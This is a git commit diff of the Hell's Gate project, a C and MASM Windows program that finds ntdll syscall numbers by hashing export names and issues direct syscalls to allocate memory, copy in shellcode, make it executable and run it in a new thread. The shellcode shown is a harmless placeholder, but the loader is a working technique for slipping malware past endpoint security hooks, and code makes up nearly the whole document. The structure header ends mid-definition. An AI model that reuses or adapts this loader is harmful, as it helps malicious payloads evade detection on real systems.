commit aade019421e234c786a0b88c0c2f41f97e542446
Author: am0nsec <20334678+am0nsec@users.noreply.github.com>
Date: Tue Jun 2 18:22:04 2020 +0100
init
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..517078a
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,360 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Ww][Ii][Nn]32/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Coverlet is a free, cross platform Code Coverage Tool
+coverage*[.json, .xml, .info]
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
+
+# Fody - auto-generated XML schema
+FodyWeavers.xsd
diff --git a/HellsGate.sln b/HellsGate.sln
new file mode 100644
index 0000000..688bc5d
--- /dev/null
+++ b/HellsGate.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30114.105
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
+ {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
+ EndGlobalSection
+EndGlobal
diff --git a/HellsGate/HellsGate.vcxproj b/HellsGate/HellsGate.vcxproj
new file mode 100644
index 0000000..20a3890
--- /dev/null
+++ b/HellsGate/HellsGate.vcxproj
@@ -0,0 +1,161 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ Win32Proj
+ {dc6187cb-d5df-4973-84a2-f92aae90cda9}
+ HellsGate
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+ false
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+ false
+
+
+ Application
+ true
+ v142
+ Unicode
+ false
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+ false
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ false
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+ Document
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/HellsGate/HellsGate.vcxproj.filters b/HellsGate/HellsGate.vcxproj.filters
new file mode 100644
index 0000000..356b0df
--- /dev/null
+++ b/HellsGate/HellsGate.vcxproj.filters
@@ -0,0 +1,32 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Source Files
+
+
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+
\ No newline at end of file
diff --git a/HellsGate/hellsgate.masm b/HellsGate/hellsgate.masm
new file mode 100644
index 0000000..83a12dd
--- /dev/null
+++ b/HellsGate/hellsgate.masm
@@ -0,0 +1,29 @@
+; Hell's Gate
+; Dynamic system call invocation
+;
+; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
+
+.data
+ wSystemCall DWORD 000h
+
+.code
+ HellsGate PROC
+ mov wSystemCall, 000h
+ mov wSystemCall, ecx
+ ret
+ HellsGate ENDP
+
+ HellDescent PROC
+ mov r10, rcx
+ mov eax, wSystemCall
+
+ syscall
+ ret
+ HellDescent ENDP
+
+
+ GetPeb PROC
+ mov rax, GS:[60h]
+ ret
+ GetPeb ENDP
+end
\ No newline at end of file
diff --git a/HellsGate/main.c b/HellsGate/main.c
new file mode 100644
index 0000000..e3f641b
--- /dev/null
+++ b/HellsGate/main.c
@@ -0,0 +1,207 @@
+/*+===================================================================
+ File: main.c
+ Summary: Original C Implementation of the Hell's Gate VX Technique
+ Classes: N/A
+ Functions: N/A
+ Origin: https://github.com/am0nsec/HellsGate
+##
+ Authors:
+ Paul Laine (@am0nsec)
+ smelly__vx (@RtlMateusz)
+===================================================================+*/
+#pragma once
+#include
+#include "structs.h"
+
+/*--------------------------------------------------------------------
+ VX Tables
+--------------------------------------------------------------------*/
+typedef struct _VX_TABLE_ENTRY {
+ PVOID pAddress;
+ DWORD64 dwHash;
+ WORD wSystemCall;
+} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
+
+typedef struct _VX_TABLE {
+ VX_TABLE_ENTRY NtAllocateVirtualMemory;
+ VX_TABLE_ENTRY NtProtectVirtualMemory;
+ VX_TABLE_ENTRY NtCreateThreadEx;
+ VX_TABLE_ENTRY NtWaitForSingleObject;
+} VX_TABLE, * PVX_TABLE;
+
+/*--------------------------------------------------------------------
+ Function prototypes.
+--------------------------------------------------------------------*/
+PTEB RtlGetThreadEnvironmentBlock();
+PPEB RtlGetProcessEnvironmentBlock();
+BOOL GetImageExportDirectory(
+ _In_ PVOID pModuleBase,
+ _Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
+);
+BOOL GetVxTableEntry(
+ _In_ PVOID pModuleBase,
+ _In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
+ _In_ PVX_TABLE_ENTRY pVxTableEntry
+);
+BOOL Payload(
+ _In_ PVX_TABLE pVxTable
+);
+PVOID VxMoveMemory(
+ _Inout_ PVOID dest,
+ _In_ const PVOID src,
+ _In_ SIZE_T len
+);
+
+/*--------------------------------------------------------------------
+ External functions' prototype.
+--------------------------------------------------------------------*/
+extern VOID HellsGate(WORD wSystemCall);
+extern HellDescent();
+
+INT wmain() {
+ PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
+ PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
+ if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA) {
+ return 0x1;
+ }
+
+ // Get NTDLL module
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+ // Get the EAT of NTDLL
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
+ if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
+ return 0x01;
+
+ VX_TABLE Table = { 0 };
+ Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
+ GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory);
+
+ Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
+ GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx);
+
+ Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
+ GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory);
+
+ Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
+ GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject);
+
+ Payload(&Table);
+ return 0x00;
+}
+
+PTEB RtlGetThreadEnvironmentBlock() {
+#if _WIN64
+ return (PTEB)__readgsqword(0x30);
+#else
+ return (PTEB)__readfsdword(0x16);
+#endif
+}
+
+PPEB RtlGetProcessEnvironmentBlock() {
+#if _WIN64
+ return (PPEB)__readgsqword(0x60);
+#else
+ return (PPEB)__readfsdword(0x30);
+#endif
+}
+
+DWORD64 djb2(PBYTE str) {
+ DWORD64 dwHash = 0x7734773477347734;
+ INT c;
+
+ while (c = *str++)
+ dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+ return dwHash;
+}
+
+BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
+ // Get DOS header
+ PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+ return FALSE;
+ }
+
+ // Get NT headers
+ PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
+ return FALSE;
+ }
+
+ // Get the EAT
+ *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ return TRUE;
+}
+
+BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
+ PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
+ PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
+ PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+ for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
+ PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
+ PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
+
+ if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
+ pVxTableEntry->pAddress = pFunctionAddress;
+
+ // MOV EAX
+ if (*((PBYTE)pFunctionAddress + 3) == 0xb8) {
+ BYTE high = *((PBYTE)pFunctionAddress + 5);
+ BYTE low = *((PBYTE)pFunctionAddress + 4);
+ pVxTableEntry->wSystemCall = (high << 8) | low;
+ break;
+ }
+ }
+ }
+
+ return TRUE;
+}
+
+BOOL Payload(PVX_TABLE pVxTable) {
+ NTSTATUS status = 0x00000000;
+ char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
+
+ // Allocate memory for the shellcode
+ PVOID lpAddress = NULL;
+ SIZE_T sDataSize = sizeof(shellcode);
+ HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
+ status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
+
+ // Write Memory
+ VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
+
+ // Change page permissions
+ ULONG ulOldProtect = NULL;
+ HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
+ status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
+
+ // Create thread
+ HANDLE hHostThread = INVALID_HANDLE_VALUE;
+ HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
+ status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
+
+ // Wait for 1 seconds
+ LARGE_INTEGER Timeout;
+ Timeout.QuadPart = -10000000;
+ HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
+ status = HellDescent(hHostThread, FALSE, &Timeout);
+
+ return TRUE;
+}
+
+PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
+ char* d = dest;
+ const char* s = src;
+ if (d < s)
+ while (len--)
+ *d++ = *s++;
+ else {
+ char* lasts = s + (len - 1);
+ char* lastd = d + (len - 1);
+ while (len--)
+ *lastd-- = *lasts--;
+ }
+ return dest;
+}
\ No newline at end of file
diff --git a/HellsGate/structs.h b/HellsGate/structs.h
new file mode 100644
index 0000000..7ed8387
--- /dev/null
+++ b/HellsGate/structs.h
@@ -0,0 +1,337 @@
+#pragma once
+#include
+
+/*--------------------------------------------------------------------
+ STRUCTURES
+--------------------------------------------------------------------*/
+typedef struct _LSA_UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+ PVOID BaseAddress;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ ULONG Flags;
+ SHORT LoadCount;
+ SHORT TlsIndex;
+ LIST_ENTRY HashTableEntry;
+ ULONG TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+ ULONG Length;
+ ULONG Initialized;
+ PVOID SsHandle;
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
+ BOOLEAN Spare;
+ HANDLE Mutant;
+ PVOID ImageBase;
+ PPEB_LDR_DATA LoaderData;
+ PVOID ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PVOID FastPebLock;
+ PVOID FastPebLockRoutine;
+ PVOID FastPebUnlockRoutine;
+ ULONG EnvironmentUpdateCount;
+ PVOID* KernelCallbackTable;
+ PVOID EventLogSection;
+ PVOID EventLog;
+ PVOID FreeList;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[0x2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID ReadOnlySharedMemoryHeap;
+ PVOID* ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+ BYTE Spare2[0x4];
+ LARGE_INTEGER CriticalSectionTimeout;
+ ULONG HeapSegmentReserve;
+ ULONG HeapSegmentCommit;
+ ULONG HeapDeCommitTotalFreeThreshold;
+ ULONG HeapDeCommitFreeBlockThreshold;
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID** ProcessHeaps;
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ PVOID GdiDCAttributeList;
+ PVOID LoaderLock;
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ ULONG OSBuildNumber;
+ ULONG OSPlatformId;
+ ULONG ImageSubSystem;
+ ULONG ImageSubSystemMajorVersion;
+ ULONG ImageSubSystemMinorVersion;
+ ULONG GdiHandleBuffer[0x22];
+ ULONG PostProcessInitRoutine;
+ ULONG TlsExpansionBitmap;
+ BYTE TlsExpansionBitmapBits[0x80];
+ ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+ ULONG Flags;
+ PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+ ULONG Flags;
+ struct _TEB_ACTIVE_FRAME* Previous;
+ PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+ ULONG Offset;
+ ULONG HDC;
+ ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+ struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+ PACTIVATION_CONTEXT ActivationContext;
+ ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+ PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+ LIST_ENTRY FrameListCache;
+ ULONG Flags;
+ ULONG NextCookieSequenceNumber;
+ ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+ NT_TIB NtTib;
+ PVOID EnvironmentPointer;
+ CLIENT_ID ClientId;
+ PVOID ActiveRpcHandle;
+ PVOID ThreadLocalStoragePointer;
+ PPEB ProcessEnvironmentBlock;
+ ULONG LastErrorValue;
+ ULONG CountOfOwnedCriticalSections;
+ PVOID CsrClientThread;
+ PVOID Win32ThreadInfo;
+ ULONG User32Reserved[26];
+ ULONG UserReserved[5];
+ PVOID WOW32Reserved;
+ LCID CurrentLocale;
+ ULONG FpSoftwareStatusRegister;
+ PVOID SystemReserved1[54];
+ LONG ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+ ULONG TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+ ACTIVATION_CONTEXT_STACK ActivationContextStack;
+ UCHAR SpareBytes1[24];
+#endif
+ GDI_TEB_BATCH GdiTebBatch;
+ CLIENT_ID RealClientId;
+ PVOID GdiCachedProcessHandle;
+ ULONG GdiClientPID;
+ ULONG GdiClientTID;
+ PVOID GdiThreadLocalInfo;
+ PSIZE_T Win32ClientInfo[62];
+ PVOID glDispatchTable[233];
+ PSIZE_T glReserved1[29];
+ PVOID glReserved2;
+ PVOID glSectionInfo;
+ PVOID glSection;
+ PVOID glTable;
+ PVOID glCurrentRC;
+ PVOID glContext;
+ NTSTATUS LastStatusValue;
+ UNICODE_STRING StaticUnicodeString;
+ WCHAR StaticUnicodeBuffer[261];
+ PVOID DeallocationStack;
+ PVOID TlsSlots[64];
+ LIST_ENTRY TlsLinks;
+ PVOID Vdm;
+ PVOID ReservedForNtRpc;
+ PVOID DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG HardErrorMode;
+#else
+ ULONG HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+ GUID ActivityId;
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+ PVOID EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ PVOID Instrumentation[14];
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+#else
+ PVOID Instrumentation[16];
+#endif
+ PVOID WinSockData;
+ ULONG GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ BOOLEAN SpareBool0;
+ BOOLEAN SpareBool1;
+ BOOLEAN SpareBool2;
+#else
+ BOOLEAN InDbgPrint;
+ BOOLEAN FreeStackOnTermination;
+ BOOLEAN HasFiberData;
+#endif
+ UCHAR IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG GuaranteedStackBytes;
+#else
+ ULONG Spare3;
+#endif
+ PVOID ReservedForPerf;
+ PVOID ReservedForOle;
+ ULONG WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID SavedPriorityState;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG_PTR SparePointer1;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR SoftPatchPtr2;
+#else
+ Wx86ThreadState Wx86Thread;
+#endif
+ PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+ PVOID DeallocationBStore;
+ PVOID BStoreLimit;
+#endif
+ ULONG ImpersonationLocale;
+ ULONG IsImpersonating;
+ PVOID NlsCache;
+ PVOID pShimData;
+ ULONG HeapVirtualAffinity;
+ HANDLE CurrentTransactionHandle;
+ PTEB_ACTIVE_FRAME ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID PreferredLangauges;
+ PVOID UserPrefLanguages;
+ PVOID MergedPrefLanguages;
+ ULONG MuiImpersonation;
+ union
+ {
+ struct
